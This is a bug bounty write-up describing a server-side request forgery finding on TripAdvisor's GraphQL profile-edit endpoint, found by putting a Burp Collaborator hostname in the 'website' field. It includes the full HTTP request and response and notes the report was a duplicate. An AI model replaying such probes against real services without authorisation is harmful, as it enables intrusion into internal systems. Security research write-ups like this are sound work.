What is SSRF?!

Server-Side Request Forgery (SSRF) is an exploit use to attack internal systems behind firewalls that are not accessible from external networks. SSRF is to access internally running services like SSH, Local-Host, FTP, and others. An SSRF scenario would be to force the server to make a connection to internal-only services within the organization’s infrastructure.

Intro:

Testing TripAdvisor for vulnerabilities and bugs, I found that it was vulnerable to SSRF. I found this vulnerability using the Burp Suite feature Collaborator. What is Burp Collaborator? Burp Collaborator is a network service that Burp Suite uses to help discover many kinds of vulnerabilities. For example, Some injection-based vulnerabilities can be detected using payloads that trigger an interaction with an external system when successful injection occurs.

This Is How I Did It:

1. Open Burp Suite>Burp menu>Burp Collaborator client and select “Burp Collaborator client”
2. Click where it says “Copy to clipboard” this will copy the payload needed to exploit the web app ex: `jhggfwo94wu094ctrtrstwrvterwt0tvwg.burpcollaborator.net`

3. Paste the Collaborator client payload into the website field as shown below and forward the request.

4. Use the “Poll now” function to retrieve details of any network interactions resulting from the payload.

5. Waited for the magic to happen.

The Http Request:

POST /data/graphql/batched HTTP/1.1
Host: www.tripadvisor.com
User-Agent: Mozilla/5.0 
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
content-type: application/json
Origin: https://www.tripadvisor.com
Content-Length: 1520
Connection: close[{"operationName":"EditProfile","variables":{"userId":"9A9A11C7013E070C233A82C19CC97D78","displayName":null,"username":null,"bio":null,"hometown":null,"website":"e3i57wj14co4lyphm5kwqx8xjoped3.burpcollaborator.net","acceptedToU":true}]

The Http Response:

RESPONSE
HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT DSP COR CAO PSA IDC ADM DEVi TAIi PSD IVAi IVDi CONi HIS CNT"
Cache-Control: no-cache, no-store, must-revalidate
Timing-Allow-Origin: https://www.tripadvisor.com
Vary: Accept-Encoding
Content-Length: 2089
Content-Type: application/json
Date: Mon, 21 Sep 2020 17:54:47 GMT
Connection: close
[{"data":{"updateMemberProfile":{"statuses":["OK"],"memberProfile":{"userId":"9A9A11C70C97D78","avatar":{"id":********,"photoSizes":[{"url":"https://dynamic-media-cdn.tripadvisor.com/media/photo-o/1a/f6/e7/99/default-avatar-2020-57.jpg?w=100&h=100&s=1","width":0,"height":0,"__typename":"PhotoSize"},{"url":"https://media-cdn.tripadvisor.com/media/photo-t/99/default-avatar-2021-75.jpg"}]

Collaborator Response:

The Report:

Here comes the interesting part of this article.

As soon I saw those logs, I told myself “Yes, I’m Rich!”. Uh well, not really. By reading their response, you can tell I got happy too soon. Someone else years ago sent in the same report. Their response caught me off guard because this was not an easy find. The exploit was only possible by carefully examining every single response/request from the web app in order to find a field to add your payload and hope for a response.

The Reward:

Looking at the photo above, you can see the outcome of this report. I have to be honest, getting 1 point as a “reward” was not what I was aiming for when I sent this report. But hey something is better than nothing, isn’t it?!

Summary

Although I didn’t get any awards for my work, something good came out of it, experience. Now I know what endpoints to exploit and with or for what. Never let this type of outcome discourage you. Duplicates mean that you did something of value, you just did it after someone else, but you did it.